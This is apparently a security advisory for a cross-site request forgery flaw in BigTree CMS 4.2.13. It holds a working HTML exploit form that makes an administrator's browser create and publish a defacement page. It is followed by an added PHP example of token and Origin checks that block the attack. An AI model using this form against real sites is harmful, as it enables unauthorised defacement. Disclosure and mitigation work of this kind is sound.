
BigTree CMS 4.2.13 Cross Site Request Forgery

Posted on 27 October 2016

-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : bigtree cms CSRF Exploit
-# Author : Ashiyane Digital Security Team
-# Vendor Homepage: https://www.bigtreecms.org/
-# Software Link:
-# https://www.bigtreecms.org/ajax/download-installer/?installer=53
-# Version : 4.2.13
-# Date: 26-10-2016
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

<html>
<head>
<title>Add page CSRF Exploit</title>
</head>
<body>
<H2>Add page CSRF Exploit</H2>
<form action="http://localhost/admin/pages/create/" method="POST">
<input type="hidden" name="_bigtree_post_check" value="success" />
<input type="hidden" name="parent" value="0" />
<input type="hidden" name="nav_title" value="deface" />
<input type="hidden" name="title" value="deface page title" />
<input type="hidden" name="in_nav" value="on" />
<input type="hidden" name="template" value="content" />
<input type="hidden" name="resources[page_header]" value="page header" />
<input type="hidden" name="resources[page_content]" value="deface text" />
<input type="submit" name="ptype" value="Create & Publish" />
</form>
</body>
</html>

-#-# Path of page: http://localhost/deface/
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght -#-#
#-# Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
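
Every field in the form above is a fixed value, including _bigtree_post_check=success; nothing in it is tied to the administrator's session, so any page can submit it on the administrator's behalf. The following is an added example, not BigTree CMS code and not the vendor's fix: a session-bound token check plus an Origin check, with csrf_token(), csrf_check(), the csrf_token field name and the sample requests all assumed for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from BigTree CMS.
declare(strict_types=1);

// Issue (or reuse) an unpredictable token stored in the admin's session.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST, carries the
// session's token, and any Origin header the browser sent is our own.
function csrf_check(array $session, array $post, array $server, string $ownOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing or non-string values, then compare in constant time.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token   = csrf_token($session);
$own     = 'http://localhost';
$post    = ['REQUEST_METHOD' => 'POST'];

// Case 1: the advisory's form fields, sent from a foreign origin, no token.
$forged = ['_bigtree_post_check' => 'success', 'parent' => '0', 'nav_title' => 'deface'];
var_dump(csrf_check($session, $forged, $post + ['HTTP_ORIGIN' => 'http://attacker.example'], $own));

// Case 2: same fields with no Origin header at all; the token is still absent.
var_dump(csrf_check($session, $forged, $post, $own));

// Case 3: the admin UI's own form, which embedded the token in a hidden field.
$legit = $forged + ['csrf_token' => $token];
var_dump(csrf_check($session, $legit, $post + ['HTTP_ORIGIN' => $own], $own));
```

In a real handler the arrays would be $_SESSION, $_POST and $_SERVER, and csrf_check() would run before /admin/pages/create/ touches the database.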

 
